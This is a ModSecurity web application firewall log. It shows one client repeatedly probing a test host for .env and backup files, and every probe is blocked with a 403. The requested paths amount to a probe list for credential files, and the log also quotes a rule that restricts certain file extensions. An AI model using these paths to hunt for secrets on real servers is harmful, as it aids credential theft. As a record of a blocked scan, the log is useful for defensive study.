[Thu Jan 08 21:18:28.778664 2026] [:error] [pid 1280390] [client 18.119.100.98:39348] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env"] [unique_id "aWARFNKTJIy7S9W5nL2LTAAAAAk"]
[Thu Jan 08 21:18:29.496317 2026] [:error] [pid 1270039] [client 18.119.100.98:39564] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aWARFZccQYhM1DUhi_W7FgAAAAQ"]
[Thu Jan 08 21:18:29.496632 2026] [:error] [pid 1270039] [client 18.119.100.98:39564] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aWARFZccQYhM1DUhi_W7FgAAAAQ"]
[Thu Jan 08 21:18:29.496783 2026] [:error] [pid 1270039] [client 18.119.100.98:39564] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aWARFZccQYhM1DUhi_W7FgAAAAQ"]
[Thu Jan 08 21:18:29.848015 2026] [:error] [pid 1270043] [client 18.119.100.98:39664] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/.env"] [unique_id "aWARFQvEr1EpOYnVfM6r0QAAAAc"]
[Thu Jan 08 21:18:29.848233 2026] [:error] [pid 1270043] [client 18.119.100.98:39664] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/.env"] [unique_id "aWARFQvEr1EpOYnVfM6r0QAAAAc"]
[Thu Jan 08 21:18:29.848403 2026] [:error] [pid 1270043] [client 18.119.100.98:39664] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/.env"] [unique_id "aWARFQvEr1EpOYnVfM6r0QAAAAc"]
[Thu Jan 08 21:18:30.197723 2026] [:error] [pid 1270035] [client 18.119.100.98:39760] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.production"] [unique_id "aWARFiYqm_i2BUcmtQb4xgAAAAA"]
[Thu Jan 08 21:18:30.197939 2026] [:error] [pid 1270035] [client 18.119.100.98:39760] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.production"] [unique_id "aWARFiYqm_i2BUcmtQb4xgAAAAA"]
[Thu Jan 08 21:18:30.198111 2026] [:error] [pid 1270035] [client 18.119.100.98:39760] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.production"] [unique_id "aWARFiYqm_i2BUcmtQb4xgAAAAA"]
[Thu Jan 08 21:18:30.547677 2026] [:error] [pid 1270041] [client 18.119.100.98:39858] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWARFs3GwEx_BV8-CrWUUgAAAAU"]
[Thu Jan 08 21:18:30.547885 2026] [:error] [pid 1270041] [client 18.119.100.98:39858] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWARFs3GwEx_BV8-CrWUUgAAAAU"]
[Thu Jan 08 21:18:30.548054 2026] [:error] [pid 1270041] [client 18.119.100.98:39858] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWARFs3GwEx_BV8-CrWUUgAAAAU"]
[Thu Jan 08 21:18:30.900446 2026] [:error] [pid 1270042] [client 18.119.100.98:39978] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.staging"] [unique_id "aWARFi7RlX2cRjHcFz6xzgAAAAY"]
[Thu Jan 08 21:18:30.900653 2026] [:error] [pid 1270042] [client 18.119.100.98:39978] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.staging"] [unique_id "aWARFi7RlX2cRjHcFz6xzgAAAAY"]
[Thu Jan 08 21:18:30.900817 2026] [:error] [pid 1270042] [client 18.119.100.98:39978] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.staging"] [unique_id "aWARFi7RlX2cRjHcFz6xzgAAAAY"]
[Thu Jan 08 21:18:31.248067 2026] [:error] [pid 1270036] [client 18.119.100.98:40092] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.local"] [unique_id "aWARF-M1154Q6b0hewij8gAAAAE"]
[Thu Jan 08 21:18:31.248272 2026] [:error] [pid 1270036] [client 18.119.100.98:40092] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.local"] [unique_id "aWARF-M1154Q6b0hewij8gAAAAE"]
[Thu Jan 08 21:18:31.248441 2026] [:error] [pid 1270036] [client 18.119.100.98:40092] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.local"] [unique_id "aWARF-M1154Q6b0hewij8gAAAAE"]
[Thu Jan 08 21:18:31.591838 2026] [:error] [pid 1270037] [client 18.119.100.98:40214] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "aWARF-A_IfWyU2EIiRhOkgAAAAI"]
[Thu Jan 08 21:18:31.592066 2026] [:error] [pid 1270037] [client 18.119.100.98:40214] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "aWARF-A_IfWyU2EIiRhOkgAAAAI"]
[Thu Jan 08 21:18:31.592222 2026] [:error] [pid 1270037] [client 18.119.100.98:40214] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "aWARF-A_IfWyU2EIiRhOkgAAAAI"]
[Thu Jan 08 21:18:31.939592 2026] [:error] [pid 1280390] [client 18.119.100.98:40330] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeapi/.env"] [unique_id "aWARF9KTJIy7S9W5nL2LTQAAAAk"]
[Thu Jan 08 21:18:31.939804 2026] [:error] [pid 1280390] [client 18.119.100.98:40330] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeapi/.env"] [unique_id "aWARF9KTJIy7S9W5nL2LTQAAAAk"]
[Thu Jan 08 21:18:31.939995 2026] [:error] [pid 1280390] [client 18.119.100.98:40330] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeapi/.env"] [unique_id "aWARF9KTJIy7S9W5nL2LTQAAAAk"]
[Thu Jan 08 21:18:32.290390 2026] [:error] [pid 1270038] [client 18.119.100.98:40440] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.staging"] [unique_id "aWARGBmwMJtANIcuNUXpMgAAAAM"]
[Thu Jan 08 21:18:32.290627 2026] [:error] [pid 1270038] [client 18.119.100.98:40440] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.staging"] [unique_id "aWARGBmwMJtANIcuNUXpMgAAAAM"]
[Thu Jan 08 21:18:32.290812 2026] [:error] [pid 1270038] [client 18.119.100.98:40440] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.staging"] [unique_id "aWARGBmwMJtANIcuNUXpMgAAAAM"]
[Thu Jan 08 21:18:32.640189 2026] [:error] [pid 1270039] [client 18.119.100.98:40538] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.production"] [unique_id "aWARGJccQYhM1DUhi_W7FwAAAAQ"]
[Thu Jan 08 21:18:32.640395 2026] [:error] [pid 1270039] [client 18.119.100.98:40538] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.production"] [unique_id "aWARGJccQYhM1DUhi_W7FwAAAAQ"]
[Thu Jan 08 21:18:32.640548 2026] [:error] [pid 1270039] [client 18.119.100.98:40538] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.production"] [unique_id "aWARGJccQYhM1DUhi_W7FwAAAAQ"]
[Thu Jan 08 21:18:32.991070 2026] [:error] [pid 1270043] [client 18.119.100.98:40650] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.local"] [unique_id "aWARGAvEr1EpOYnVfM6r0gAAAAc"]
[Thu Jan 08 21:18:32.991287 2026] [:error] [pid 1270043] [client 18.119.100.98:40650] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.local"] [unique_id "aWARGAvEr1EpOYnVfM6r0gAAAAc"]
[Thu Jan 08 21:18:32.991445 2026] [:error] [pid 1270043] [client 18.119.100.98:40650] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.local"] [unique_id "aWARGAvEr1EpOYnVfM6r0gAAAAc"]
[Thu Jan 08 21:18:33.338188 2026] [:error] [pid 1270035] [client 18.119.100.98:40760] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.local"] [unique_id "aWARGSYqm_i2BUcmtQb4xwAAAAA"]
[Thu Jan 08 21:18:33.338418 2026] [:error] [pid 1270035] [client 18.119.100.98:40760] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.local"] [unique_id "aWARGSYqm_i2BUcmtQb4xwAAAAA"]
[Thu Jan 08 21:18:33.338569 2026] [:error] [pid 1270035] [client 18.119.100.98:40760] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.local"] [unique_id "aWARGSYqm_i2BUcmtQb4xwAAAAA"]
[Thu Jan 08 21:18:33.683944 2026] [:error] [pid 1270041] [client 18.119.100.98:40872] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.local"] [unique_id "aWARGc3GwEx_BV8-CrWUUwAAAAU"]
[Thu Jan 08 21:18:33.684158 2026] [:error] [pid 1270041] [client 18.119.100.98:40872] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.local"] [unique_id "aWARGc3GwEx_BV8-CrWUUwAAAAU"]
[Thu Jan 08 21:18:33.684322 2026] [:error] [pid 1270041] [client 18.119.100.98:40872] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.local"] [unique_id "aWARGc3GwEx_BV8-CrWUUwAAAAU"]
